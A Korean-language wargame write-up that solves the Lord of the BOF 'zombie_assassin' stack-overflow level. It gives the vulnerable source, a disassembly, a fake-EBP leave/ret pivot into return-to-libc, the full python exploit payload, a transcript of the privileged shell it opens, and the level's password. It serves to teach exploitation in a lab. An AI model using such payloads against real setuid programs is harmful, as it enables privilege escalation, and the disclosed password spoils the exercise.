소스는 이렇다.
/*
The Lord of the BOF : The Fellowship of the BOF
- zombie_assassin
- FEBP
*/
#include <stdio.h>
#include <stdlib.h>
/*
 * Challenge target: main() copies argv[1] into a 40-byte stack buffer.
 * As listed, main has no return type (implicit int) and strncpy is used
 * without #include <string.h>, so it is implicitly declared; both are
 * pre-C99 habits and neither affects the overflow described below.
 */
main(int argc, char *argv[])
{
char buffer[40];    /* the disassembly places this at -0x28(%ebp), directly below saved EBP and the return address */
if(argc < 2){
printf("argv error\n");
exit(0);
}
/* Both filters inspect one byte, argv[1][47]: the last byte the strncpy
 * below can write, i.e. the most significant byte of the overwritten
 * return address on this little-endian x86 frame. No length check precedes
 * the index, so an argv[1] shorter than 48 bytes is read past its
 * terminator (out-of-bounds read). Rejecting two values is a denylist,
 * not a bound: any other byte passes. */
if(argv[1][47] == '\xbf')
{
printf("stack retbayed you!\n");
exit(0);
}
if(argv[1][47] == '\x40')
{
printf("library retbayed you, too!!\n");
exit(0);
}
/* strncpy instead of strcpy — but the bound is 48, not sizeof buffer (40):
 * up to 8 bytes land past the buffer, over saved EBP (bytes 40-43) and the
 * saved return address (bytes 44-47), which the leave/ret at the end of
 * main then consume. strncpy also does not NUL-terminate when the source
 * is 48 bytes or longer, so the printf below can read beyond buffer.
 * Fix: bound the copy by the buffer and terminate explicitly, e.g.
 * snprintf(buffer, sizeof buffer, "%s", argv[1]). */
strncpy(buffer, argv[1], 48);
printf("%s\n", buffer);
}
일단 RET 부분에 라이브러리 주소(\x40)와 버퍼 주소(\xbf)를 막아놓았다.
그래서 RET에 들어갈 주소를 다른 곳으로 옮길 필요가 있는데,
RET를 main의 어셈블리 코드 쪽으로 돌리면 결과적으로 RET를 버퍼로 옮길 수 있다.
어셈블리
Dump of assembler code for function main:
0x8048440 <main>: push %ebp
0x8048441 <main+1>: mov %esp,%ebp
0x8048443 <main+3>: sub $0x28,%esp
0x8048446 <main+6>: cmpl $0x1,0x8(%ebp)
0x804844a <main+10>: jg 0x8048463 <main+35>
0x804844c <main+12>: push $0x8048540
0x8048451 <main+17>: call 0x8048354 <printf>
0x8048456 <main+22>: add $0x4,%esp
0x8048459 <main+25>: push $0x0
0x804845b <main+27>: call 0x8048364 <exit>
0x8048460 <main+32>: add $0x4,%esp
0x8048463 <main+35>: mov 0xc(%ebp),%eax
0x8048466 <main+38>: add $0x4,%eax
0x8048469 <main+41>: mov (%eax),%edx
0x804846b <main+43>: add $0x2f,%edx
0x804846e <main+46>: cmpb $0xbf,(%edx)
0x8048471 <main+49>: jne 0x8048490 <main+80>
0x8048473 <main+51>: push $0x804854c
0x8048478 <main+56>: call 0x8048354 <printf>
0x804847d <main+61>: add $0x4,%esp
0x8048480 <main+64>: push $0x0
0x8048482 <main+66>: call 0x8048364 <exit>
0x8048487 <main+71>: add $0x4,%esp
0x804848a <main+74>: lea 0x0(%esi),%esi
0x8048490 <main+80>: mov 0xc(%ebp),%eax
0x8048493 <main+83>: add $0x4,%eax
0x8048496 <main+86>: mov (%eax),%edx
0x8048498 <main+88>: add $0x2f,%edx
0x804849b <main+91>: cmpb $0x40,(%edx)
0x804849e <main+94>: jne 0x80484b7 <main+119>
0x80484a0 <main+96>: push $0x8048561
0x80484a5 <main+101>: call 0x8048354 <printf>
0x80484aa <main+106>: add $0x4,%esp
0x80484ad <main+109>: push $0x0
0x80484af <main+111>: call 0x8048364 <exit>
0x80484b4 <main+116>: add $0x4,%esp
0x80484b7 <main+119>: push $0x30
---Type <return> to continue, or q <return> to quit---
0x80484b9 <main+121>: mov 0xc(%ebp),%eax
0x80484bc <main+124>: add $0x4,%eax
0x80484bf <main+127>: mov (%eax),%edx
0x80484c1 <main+129>: push %edx
0x80484c2 <main+130>: lea 0xffffffd8(%ebp),%eax
0x80484c5 <main+133>: push %eax
0x80484c6 <main+134>: call 0x8048374 <strncpy>
0x80484cb <main+139>: add $0xc,%esp
0x80484ce <main+142>: lea 0xffffffd8(%ebp),%eax
0x80484d1 <main+145>: push %eax
0x80484d2 <main+146>: push $0x804857e
0x80484d7 <main+151>: call 0x8048354 <printf>
0x80484dc <main+156>: add $0x8,%esp
0x80484df <main+159>: leave
0x80484e0 <main+160>: ret
여기서 RET를 leave 명령의 주소로 돌려버리면
leave와 ret가 다시 수행되면서 ret가 참조하는 위치를 buffer로 옮길 수 있게 되고, buffer에 system 주소를 넣어 두면 그것이 RET로 쓰여 system이 실행된다. 이 다음은 이전 문제의 RTL 풀이와 동일하다.
페이로드는
[AAAA] + [&SYSTEM] + [&EXIT] + [&/bin/sh] + [dummy] + [&BUFFER] + [&LEAVE]
./zombie_assassin "`python -c 'print "AAAA" + "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40" + "A"*24 + "\xef\xfb\xff\xbf" + "\xdf\x84\x04\x08"'`"
[assassin@localhost tmp]$ ./zombie_assassin "`python -c 'print "AAA
A" + "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40" + "A"*24 + "\xef\xfb\xff\xbf" + "\xdf\x84\x04\x08"'`"AAAAɀσ@AAAAAAAAAAAAAAAAAAAAAA༿¿߄
bash$ exit
exit
[assassin@localhost tmp]$ cd ..
[assassin@localhost assassin]$ ./zombie_assassin "`python -c 'print
"AAAA" + "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40" + "A"*24 + "\xef\xfb\xff\xbf" + "\xdf\x84\x04\x08"'`"AAAAɀσ@AAAAAAAAAAAAAAAAAAAAAA༿¿߄
bash$ id
uid=515(assassin) gid=515(assassin) euid=516(zombie_assassin) egid=
516(zombie_assassin) groups=515(assassin)bash$ my-pass
euid = 516
no place to hide